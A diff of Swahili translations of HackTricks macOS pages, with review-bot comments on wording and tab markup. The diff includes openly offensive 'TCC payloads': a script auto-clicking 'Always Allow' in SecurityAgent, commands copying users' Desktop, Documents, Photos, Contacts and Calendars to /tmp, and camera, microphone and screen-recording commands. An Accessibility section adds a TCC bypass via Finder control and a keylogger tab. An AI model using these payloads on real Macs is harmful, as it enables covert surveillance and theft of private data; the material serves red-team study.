Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Skripti za Apple
## Apple Scripts
Hii ni lugha ya skripti inayotumiwa kwa **utomatishaji wa kazi** kwa **kuingiliana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kutekeleza baadhi ya hatua**. **Programu hasidi** inaweza kutumia vipengele hivi kudhuru kazi zinazotolewa na michakato mingine.\
Kwa mfano, programu hasidi inaweza **kuingiza msimbo wa JS usiojulikana kwenye kurasa zilizofunguliwa kwenye kivinjari**. Au **bonyeza moja kwa moja** ruhusa zinazoruhusiwa zinazohitajika na mtumiaji.
Ni lugha ya skripti inayotumika kwa otomatiki ya kazi **kuingiliana na michakato ya mbali**. Inafanya iwe rahisi **kuomba michakato mingine kutekeleza vitendo vingine**. **Malware** inaweza kutumia vipengele hivi kuboresha kazi zinazotolewa na michakato mingine.\
Kwa mfano, malware inaweza **kuingiza msimbo wa JS wa kiholela katika kurasa zilizofunguliwa za kivinjari**. Au **kubonyeza kiotomatiki** baadhi ya ruhusa zinazohitajika kwa mtumiaji;
```applescript
tell window 1 of process "SecurityAgent"
click button "Always Allow" of group 1
end tell
```
Hapa una mifano kadhaa: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
Pata habari zaidi kuhusu programu hasidi zinazotumia AppleScripts [**hapa**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Here you have some examples: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
Find more info about malware using applescripts [**here**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/).
Skripti za Apple zinaweza kuwa rahisi "**kukusanywa**". Toleo hizi zinaweza kuwa rahisi "**kukusanywa upya**" na `osadecompile`
Apple scripts yanaweza "kukatwa" kwa urahisi. Matoleo haya yanaweza "kufutwa" kwa urahisi na `osadecompile`
Hata hivyo, skripti hizi pia zinaweza **kuwa zimehifadhiwa kama "Soma tu"** (kupitia chaguo la "Hifadhi..."):
Hata hivyo, skripti hizi zinaweza pia **kuzalishwa kama "Soma tu"** (kupitia chaguo la "Zalisha..."):
<figure><img src="https://github.com/carlospolop/hacktricks/raw/master/.gitbook/assets/image%20(556).png" alt=""><figcaption></figcaption></figure>
```
file mal.scpt
mal.scpt: AppleScript compiled
```
Na katika kesi hii, yaliyomo hayawezi kuchambuliwa hata na `osadecompile`
na katika kesi hii maudhui hayawezi kufanywa decompiled hata kwa `osadecompile`
Hata hivyo, bado kuna zana kadhaa ambazo zinaweza kutumika kuelewa programu hizi, [**soma utafiti huu kwa maelezo zaidi**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). Zana [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) pamoja na [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) itakuwa muhimu sana kuelewa jinsi skripti inavyofanya kazi.
Hata hivyo, bado kuna zana ambazo zinaweza kutumika kuelewa aina hii ya executable, [**soma utafiti huu kwa maelezo zaidi**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). Zana [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) pamoja na [**aevt\_decompile**](https://github.com/SentineLabs/aevt\_decompile) itakuwa muhimu sana kuelewa jinsi script inavyofanya kazi.
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
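Review bot: The new sentence `Apple scripts yanaweza "kukatwa" kwa urahisi. Matoleo haya yanaweza "kufutwa" kwa urahisi na osadecompile` loses the meaning of the original: "kukatwa" (cut) and "kufutwa" (deleted) replace what the old line rendered as compiled ("kukusanywa") and decompiled ("kukusanywa upya"), and the `osadecompile` tool name in the same sentence makes the intended meaning clear. Also in this hunk, the `## Apple Scripts` heading and the two lines `Here you have some examples:` and `Find more info about malware using applescripts here` are switched back to English while the rest of the section stays Swahili, and the doubled `))` after the "soma utafiti huu kwa maelezo zaidi" link survives in both versions and should be a single parenthesis.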

View file

@ -1,28 +1,28 @@
# macOS TCC Payloads
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### Desktop
* **Uhalali**: Hakuna
* **Entitlement**: Hakuna
* **TCC**: kTCCServiceSystemPolicyDesktopFolder
{% tabs %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Desktop` hadi `/tmp/desktop`.
Copy `$HOME/Desktop` to `/tmp/desktop`.
```objectivec
#include <syslog.h>
#include <stdio.h>
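Review bot: The tab description `Copy $HOME/Desktop to /tmp/desktop.` replaces a Swahili line with English, and the field label `**Entitlement**: Hakuna` mixes the English term into a Swahili list; the other sections of this file use Haki, Ruhusa or Uwezo for the same field, so one term should be chosen for the whole page. The tab title `ObjetiveC` (context line) is misspelled and recurs in several tabs below; `ObjectiveC`, as used in the Calendar tab, is the intended spelling.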
@ -58,7 +58,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Desktop` hadi `/tmp/desktop`.
```bash
cp -r "$HOME/Desktop" "/tmp/desktop"
```
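Review bot: Removing `Nakili $HOME/Desktop hadi /tmp/desktop.` leaves the Shell tab with no description line, unlike the other Shell tabs in this file, which keep their one-line lead; either keep the sentence or drop it consistently in every Shell tab.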
@ -67,15 +66,12 @@ cp -r "$HOME/Desktop" "/tmp/desktop"
### Nyaraka
* **Entitlement**: Hakuna
* **Haki**: Hakuna
* **TCC**: `kTCCServiceSystemPolicyDocumentsFolder`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Documents` hadi `/tmp/documents`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
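Review bot: `**Entitlement**: Hakuna` becomes `**Haki**: Hakuna` here, the opposite direction of the change made in the Desktop section a few lines earlier (Uhalali to Entitlement), so the two sections end up with different labels for the same field. Replacing the `{% tab title="undefined" %}` pair and the stray `{% endtab %}` with a single tab is the right structural fix, but it carries over the `ObjetiveC` misspelling.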
@ -111,24 +107,20 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/`Documents hadi `/tmp/documents`.
```bash
cp -r "$HOME/Documents" "/tmp/documents"
```
{% endtab %}
{% endtabs %}
### Vipakuzi
### Downloads
* **Uhalali**: Hakuna
* **Entitlement**: Hakuna
* **TCC**: `kTCCServiceSystemPolicyDownloadsFolder`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Downloads` hadi `/tmp/downloads`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -163,8 +155,7 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Nakili `$HOME/Downloads` kwenda `/tmp/downloads`.
Nakili `$HOME/Dowloads` hadi `/tmp/downloads`.
```bash
cp -r "$HOME/Downloads" "/tmp/downloads"
```
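Review bot: The new Shell-tab line `Nakili $HOME/Dowloads hadi /tmp/downloads.` introduces a typo ("Dowloads") where the removed line had `Downloads` spelled correctly, so the path in the prose no longer matches the `cp -r "$HOME/Downloads"` command beneath it. The context line `Nakili $HOME/`Documents hadi `/tmp/documents`.` also has a misplaced backtick; the span should be `$HOME/Documents`. The `### Downloads` heading is switched back to English while the description lines stay Swahili.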
@ -173,15 +164,12 @@ cp -r "$HOME/Downloads" "/tmp/downloads"
### Maktaba ya Picha
* **Uwezo**: `com.apple.security.personal-information.photos-library`
* **Haki**: `com.apple.security.personal-information.photos-library`
* **TCC**: `kTCCServicePhotos`
{% tabs %}
{% tab title="undefined" %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Pictures/Photos Library.photoslibrary` hadi `/tmp/photos`.
{% endtab %}
{% tab title="undefined" %}
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -216,23 +204,21 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Nakili `$HOME/Pictures/Photos Library.photoslibrary` kwenda `/tmp/photos`.
Nakili `$HOME/Pictures/Photos Library.photoslibrary` hadi `/tmp/photos`.
```bash
cp -r "$HOME/Pictures/Photos Library.photoslibrary" "/tmp/photos"
```
{% endtab %}
{% endtabs %}
### Wasiliana
### Mawasiliano
* **Uwezo**: `com.apple.security.personal-information.addressbook`
* **Ruhusa**: `com.apple.security.personal-information.addressbook`
* **TCC**: `kTCCServiceAddressBook`
{% tabs %}
{% tab title="ObjetiveC" %}
Nakili `$HOME/Library/Application Support/AddressBook` hadi `/tmp/contacts`.
```objectivec
#include <syslog.h>
#include <stdio.h>
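Review bot: `**Ruhusa**` is used for the entitlement field here while the Photos section immediately above changed the same field to `**Haki**`; the label should be the same in every section. The heading change to `### Mawasiliano` (Contacts) reads correctly.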
@ -268,7 +254,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Library/Application Support/AddressBook` hadi `/tmp/contacts`.
```bash
cp -r "$HOME/Library/Application Support/AddressBook" "/tmp/contacts"
```
@ -277,13 +262,12 @@ cp -r "$HOME/Library/Application Support/AddressBook" "/tmp/contacts"
### Kalenda
* **Haki**: `com.apple.security.personal-information.calendars`
* **Ruhusa**: `com.apple.security.personal-information.calendars`
* **TCC**: `kTCCServiceCalendar`
{% tabs %}
{% tab title="ObjectiveC" %}
Nakili `$HOME/Library/Calendars` hadi `/tmp/calendars`.
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -319,7 +303,6 @@ fclose(stderr); // Close the file stream
{% tab title="Shell" %}
Nakili `$HOME/Library/Calendars` hadi `/tmp/calendars`.
```bash
cp -r "$HOME/Library/Calendars" "/tmp/calendars"
```
@ -328,15 +311,12 @@ cp -r "$HOME/Library/Calendars" "/tmp/calendars"
### Kamera
* **Uwezo**: `com.apple.security.device.camera`
* **Ruhusa**: `com.apple.security.device.camera`
* **TCC**: `kTCCServiceCamera`
{% tabs %}
{% tab title="undefined" %}
Rekodi video ya sekunde 3 na iihifadhi kwenye **`/tmp/recording.mov`**
{% endtab %}
{% tab title="undefined" %}
{% tab title="ObjetiveC - Rekodi" %}
Rekodi video ya sekunde 3 na uhifadhi katika **`/tmp/recording.mov`**
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -414,9 +394,8 @@ fclose(stderr); // Close the file stream
```
{% endtab %}
{% tab title="ObjectiveC - Angalia" %}
Angalia ikiwa programu ina ufikiaji wa kamera.
{% tab title="ObjectiveC - Check" %}
Kagua ikiwa programu ina ufikiaji wa kamera.
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -449,23 +428,22 @@ fclose(stderr); // Close the file stream
{% endtab %}
{% tab title="Shell" %}
Chukua picha na kamera
Piga picha na kamera
{% endtab %}
```bash
ffmpeg -framerate 30 -f avfoundation -i "0" -frames:v 1 /tmp/capture.jpg
```
{% endtab %}
{% endtabs %}
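Review bot: The `{% endtab %}` right after `Piga picha na kamera` closes the Shell tab before its bash block, so the `ffmpeg` capture command sits outside any tab and the second `{% endtab %}` after the code block has no matching open; the first `{% endtab %}` should be removed. Also in this hunk the tab title changes to `ObjectiveC - Check` while its sibling tab above is titled `ObjetiveC - Rekodi`, so the two titles now mix languages and spellings.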
### Kipaza sauti
### Microphone
* **Ruhusa**: **com.apple.security.device.audio-input**
* **Entitlement**: **com.apple.security.device.audio-input**
* **TCC**: `kTCCServiceMicrophone`
{% tabs %}
{% tab title="ObjetiveC - Rekodi" %}
Rekodi sauti ya sekunde 5 na uhifadhi kwenye `/tmp/recording.m4a`
{% tab title="ObjetiveC - Record" %}
Record 5s of audio na uhifadhi katika `/tmp/recording.m4a`
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
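Review bot: The new description `Record 5s of audio na uhifadhi katika /tmp/recording.m4a` is half English and half Swahili; the removed line `Rekodi sauti ya sekunde 5 na uhifadhi kwenye /tmp/recording.m4a` was fully translated and should be restored. The same hunk flips `**Ruhusa**` back to `**Entitlement**` and the tab title from `ObjetiveC - Rekodi` to `ObjetiveC - Record`, again inconsistent with the other sections.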
@ -564,9 +542,8 @@ fclose(stderr); // Close the file stream
```
{% endtab %}
{% tab title="ObjectiveC - Angalia" %}
{% tab title="ObjectiveC - Check" %}
Angalia ikiwa programu ina ufikiaji wa kipaza sauti.
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
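Review bot: The tab title changes from `ObjectiveC - Angalia` to `ObjectiveC - Check` while the description beneath it, `Angalia ikiwa programu ina ufikiaji wa kipaza sauti.`, stays Swahili; keep the title in the same language as its content.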
@ -597,8 +574,7 @@ static void telegram(int argc, const char **argv) {
{% endtab %}
{% tab title="Shell" %}
Rekodi sauti ya sekunde 5 na uhifadhi kwenye `/tmp/recording.wav`
Rekodi sauti ya sekunde 5 na uhifadhi katika `/tmp/recording.wav`
```bash
# Check the microphones
ffmpeg -f avfoundation -list_devices true -i ""
@ -611,16 +587,15 @@ ffmpeg -f avfoundation -i ":1" -t 5 /tmp/recording.wav
### Mahali
{% hint style="success" %}
Ili programu ipate mahali, **Huduma za Mahali** (kutoka kwa Faragha na Usalama) **lazima ziwezeshwe,** vinginevyo haitaweza kufikia hiyo.
Ili programu iweze kupata mahali, **Huduma za Mahali** (kutoka kwa Faragha na Usalama) **lazima ziwe zimeshawekwa,** vinginevyo haitoweza kuzipata.
{% endhint %}
* **Haki**: `com.apple.security.personal-information.location`
* **TCC**: Imeidhinishwa katika `/var/db/locationd/clients.plist`
* **Ruhusa**: `com.apple.security.personal-information.location`
* **TCC**: Imepewa katika `/var/db/locationd/clients.plist`
{% tabs %}
{% tab title="ObjectiveC" %}
Andika mahali katika `/tmp/logs.txt`
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -670,8 +645,7 @@ freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
{% endtab %}
{% tab title="Shell" %}
Pata ufikiaji wa eneo hilo
Pata ufikiaji wa eneo
```
???
```
@ -686,7 +660,6 @@ Pata ufikiaji wa eneo hilo
{% tabs %}
{% tab title="ObjectiveC" %}
Rekodi skrini kuu kwa sekunde 5 katika `/tmp/screen.mov`
```objectivec
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
@ -744,7 +717,7 @@ freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt
{% tab title="Shell" %}
Rekodi skrini kuu kwa sekunde 5
{% endtab %}
```bash
screencapture -V 5 /tmp/screen.mov
```
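Review bot: As in the Camera section, the `{% endtab %}` placed directly after `Rekodi skrini kuu kwa sekunde 5` closes the Shell tab before the `screencapture -V 5 /tmp/screen.mov` block, leaving the command outside the tab; move that `{% endtab %}` to after the closing code fence.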
@ -756,8 +729,10 @@ screencapture -V 5 /tmp/screen.mov
* **Haki**: Hakuna
* **TCC**: `kTCCServiceAccessibility`
Tumia haki ya TCC kukubali udhibiti wa Finder kwa kubonyeza enter na kuepuka TCC kwa njia hiyo.
Tumia haki ya TCC kukubali udhibiti wa Finder kwa kubonyeza enter na kupita TCC kwa njia hiyo
{% tabs %}
{% tab title="Kubaliana na TCC" %}
```objectivec
#import <Foundation/Foundation.h>
#import <ApplicationServices/ApplicationServices.h>
@ -808,9 +783,10 @@ usleep(100000); // 0.1 seconds
return 0;
}
```
{% endtab %}
Hifadhi funguo zilizopigwa kwenye **`/tmp/keystrokes.txt`**
{% tab title="Keylogger" %}
Hifadhi funguo zilizobonyeza katika **`/tmp/keystrokes.txt`**
```objectivec
#import <Foundation/Foundation.h>
#import <ApplicationServices/ApplicationServices.h>
@ -914,21 +890,24 @@ CFRunLoopRun();
return 0;
}
```
{% endtab %}
{% endtabs %}
{% hint style="danger" %}
**Uwezo wa Ufikiaji ni idhini yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya shambulio la **keystrokes** kutoka hapo bila haja ya kuita Matukio ya Mfumo.
**Upatikanaji ni ruhusa yenye nguvu sana**, unaweza kuitumia vibaya kwa njia nyingine, kwa mfano unaweza kufanya **shambulio la funguo** moja kwa moja kutoka hapo bila kuhitaji kuita Matukio ya Mfumo.
{% endhint %}
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
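Review bot: In the danger hint, `**Upatikanaji ni ruhusa yenye nguvu sana**` renders the Accessibility permission as "Upatikanaji" (availability), which does not match the `kTCCServiceAccessibility` permission this section is about; the removed line's `Ufikiaji`, the same word used in the "ufikiaji wa kamera" descriptions above, or the untranslated name Accessibility would keep the reference recognizable.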

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
@ -60,16 +61,17 @@ Njia nyingine za kusaidia HackTricks:
{% embed url="https://ippsec.rocks/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

